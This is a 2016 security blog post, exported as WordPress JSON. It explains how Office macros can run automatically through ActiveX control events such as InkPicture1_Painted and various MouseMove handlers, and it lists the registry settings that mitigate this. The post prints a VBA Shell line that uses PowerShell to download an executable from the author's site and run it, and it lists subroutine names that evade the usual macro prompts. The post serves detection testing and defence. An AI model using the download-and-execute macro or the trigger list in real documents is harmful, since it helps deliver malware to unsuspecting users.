{"id":948,"date":"2016-09-29T16:21:32","date_gmt":"2016-09-29T15:21:32","guid":{"rendered":"http:\/\/www.greyhathacker.net\/?p=948"},"modified":"2016-09-30T22:37:47","modified_gmt":"2016-09-30T21:37:47","slug":"running-macros-via-activex-controls","status":"publish","type":"post","link":"https:\/\/www.greyhathacker.net\/?p=948","title":{"rendered":"Running Macros via ActiveX Controls"},"content":{"rendered":"

A couple of months ago I encountered a malicious macro Word document and after analysing it, it was found to be using a new vector to execute the macro. I’m not sure if this method had ever been used before but it was using macros with an embedded ActiveX control object in the document.<\/p>\n

Most malicious Word documents use the usual reserved names such as AutoOpen() and Document_Open() to automatically run macros. This document in question was using a subroutine name of InkPicture1_Painted() to execute code once the ActiveX control got enabled. This routine comes from an ActiveX control \u201cMicrosoft InkPicture Control\u201d embedded in the document.<\/p>\n

ActiveX Controls for malicious use<\/strong>
\nIf we wanted to embed ActiveX control in a document it is pretty straightforward to do. Once the developer tab is enabled (File – Options – Customize Ribbon) go to the developer tab and Controls section on the ribbon. A huge list of controls is given which could be used to embed in the document.<\/p>\n

\"\"<\/p>\n

Each control gives the option to add macros to its procedures<\/p>\n

\"\"<\/p>\n

We can see below that there are dozens of procedures that could be used<\/p>\n

\"\"<\/p>\n

After testing each ActiveX control object and all its procedures a large number of procedures were able to automatically run macros. Not all controls can be embedded into the document but majority can be and are listed in the table below.<\/p>\n\n\n\n\n\n\n\n\n\n\n
ActiveX Control<\/strong><\/td>\nSubroutine name<\/strong><\/td>\n<\/tr>\n
Microsoft Forms 2.0 Frame<\/td>\nFrame1_Layout<\/td>\n<\/tr>\n
Microsoft Forms 2.0 MultiPage<\/td>\nMultiPage1_Layout<\/td>\n<\/tr>\n
Microsoft ImageComboBox Control, version 6.0<\/td>\nImageCombo21_Change<\/td>\n<\/tr>\n
Microsoft InkEdit Control<\/td>\nInkEdit1_GotFocus<\/td>\n<\/tr>\n
Microsoft InkPicture Control<\/td>\nInkPicture1_Painted
\nInkPicture1_Painting
\nInkPicture1_Resize<\/td>\n<\/tr>\n
System Monitor Control<\/td>\nSystemMonitor1_GotFocus
\nSystemMonitor1_LostFocus<\/td>\n<\/tr>\n
Microsoft Web Browser<\/td>\nWebBrowser1_BeforeNavigate2
\nWebBrowser1_BeforeScriptExecute
\nWebBrowser1_DocumentComplete
\nWebBrowser1_DownloadBegin
\nWebBrowser1_DownloadComplete
\nWebBrowser1_FileDownload
\nWebBrowser1_NavigateComplete2
\nWebBrowser1_NavigateError
\nWebBrowser1_ProgressChange
\nWebBrowser1_PropertyChange
\nWebBrowser1_SetSecureLockIcon
\nWebBrowser1_StatusTextChange
\nWebBrowser1_TitleChange<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

The controls listed below when used with these subroutines names has an interesting behaviour in that moving the mouse on top of the embedded object triggers the macro.<\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
ActiveX Control<\/strong><\/td>\nSubroutine name<\/strong><\/td>\n<\/tr>\n
Microsoft Forms 2.0 Frame<\/td>\nFrame1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 MultiPage<\/td>\nMultiPage1_MouseMove<\/td>\n<\/tr>\n
Microsoft InkEdit Control<\/td>\nInkEdit1_MouseMove<\/td>\n<\/tr>\n
Microsoft InkPicture Control<\/td>\nInkPicture1_MouseMove
\nInkPicture1_MouseHover
\nInkPicture1_MouseEnter
\nInkPicture1_MouseLeave<\/td>\n<\/tr>\n
Microsoft Forms 2.0 CheckBox<\/td>\nCheckBox1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 ComboBox<\/td>\nComboBox1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 CommandButton<\/td>\nCommandButton1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 Image<\/td>\nImage1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 Label<\/td>\nLabel1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 ListBox<\/td>\nListBox1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 OptionButton<\/td>\nOptionButton1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 TabStrip<\/td>\nTabStrip1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 TextBox<\/td>\nTextBox1_MouseMove<\/td>\n<\/tr>\n
Microsoft Forms 2.0 Toggle Button<\/td>\nToggleButton1_MouseMove<\/td>\n<\/tr>\n
Microsoft ListView Control, version 6.0<\/td>\nListView41_MouseMove<\/td>\n<\/tr>\n
Microsoft ProgressBar Control, version 6.0<\/td>\nProgressBar21_MouseMove<\/td>\n<\/tr>\n
Microsoft Slider Control, version 6.0<\/td>\nSlider21_MouseMove<\/td>\n<\/tr>\n
Microsoft StatusBar Control, version 6.0<\/td>\nStatusBar31_MouseMove<\/td>\n<\/tr>\n
Microsoft TabStrip Control, version 6.0<\/td>\nTabStrip31_MouseMove<\/td>\n<\/tr>\n
Microsoft Toolbar Control, version 6.0<\/td>\nToolbar31_MouseMove<\/td>\n<\/tr>\n
Microsoft TreeView Control, version 6.0<\/td>\nTreeView41_MouseMove<\/td>\n<\/tr>\n
MSREdit Class<\/td>\nAMSREdit1_MouseMove<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

There are more ActiveX controls not listed as those need some further action i.e. clicking on the embedded object to trigger the macro. Tested were carried out mainly using Word and Excel of Microsoft Office 2010 x64 on Windows 7.<\/p>\n

User Awareness<\/strong>
\nUsers hopefully should know by now that macros are dangerous so even if received they would be prompted by two warning prompts. The first is the usual “Protected View” warning when documents are received from the Internet.<\/p>\n

\"\"<\/p>\n

After enabling editing then the usual macro prompt appears. At this point we hope the user would think before clicking<\/p>\n

\"\"<\/p>\n

With macros being used with ActiveX controls we do not see the usual macro warning prompt but an ActiveX prompt so users might fall victim to clicking on it.<\/p>\n

\"\"<\/p>\n

Mitigation<\/strong>
\nThere are settings in Microsoft Office to disable ActiveX controls completely if necessary.<\/p>\n

\"\"<\/p>\n

Using the registry settings<\/p>\n

Disable all controls without notification\r\n\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Security]\r\n\"DisableAllActiveX\"=dword:00000001\r\n\r\nPrompt me before enabling UFI controls\r\n\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Security]\r\n\"DisableAllActiveX\"=dword:00000000\r\n\"UFIControls\"=dword:00000004\u00a0 (3 if Safe mode unticked)\r\n\r\nPrompt me before enabling all controls with minimal restrictions\r\n\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Security]\r\n\"DisableAllActiveX\"=dword:00000000\r\n\"UFIControls\"=dword:00000006\u00a0 (5 if Safe mode unticked)\r\n\r\nEnable all controls without restrictions and without prompting\r\n\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Security]\r\n\"DisableAllActiveX\"=dword:00000000\r\n\"UFIControls\"=dword:00000002\u00a0 (1 if Safe mode unticked)<\/pre>\n
Testing Threat Detection Appliances<\/strong>
\nYou can download this zip<\/a> file (password is “macros”) which contains three documents you can use to test your appliances to see how well they score.<\/p>\n
document_open_messbox.docm – This document uses the normal reserved name Document_Open to automatically run macro.
\ninkedit1_gotfocus_messbox.docm – This document uses ActiveX “Microsoft InkEdit Control” to automatically run macro.
\ninkedit1_mousemove_messbox.docm – This document uses ActiveX “Microsoft InkEdit Control” to run macro by mouse movement on the page.<\/p>\n
The macro contained in the document uses Powershell to download and execute messbox.exe from my site so should flag all three documents as malicious.<\/p>\n
run = Shell(\"cmd.exe \/c PowerShell (New-Object System.Net.WebClient).DownloadFile('http:\/\/www.greyhathacker.net\/tools\/messbox.exe','mess.exe');Start-Process 'mess.exe'\",vbNormalFocus)<\/pre>\n
It would be interesting to know which appliances flagged which documents as malicious so do tweet me or add a comment. Thanks all.<\/p>\n","protected":false},"excerpt":{"rendered":"
A couple of months ago I encountered a malicious macro Word document and after analysing it, it was found to be using a new vector to execute the macro. I’m not sure if this method had ever been used before but it was using macros with an embedded ActiveX control object in the document. Most […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,34],"tags":[49,47],"class_list":["post-948","post","type-post","status-publish","format-standard","hentry","category-all","category-other","tag-activex","tag-macros"],"_links":{"self":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/948","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=948"}],"version-history":[{"count":7,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/948\/revisions"}],"predecessor-version":[{"id":955,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/948\/revisions\/955"}],"wp:attachment":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=948"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=948"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=948"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}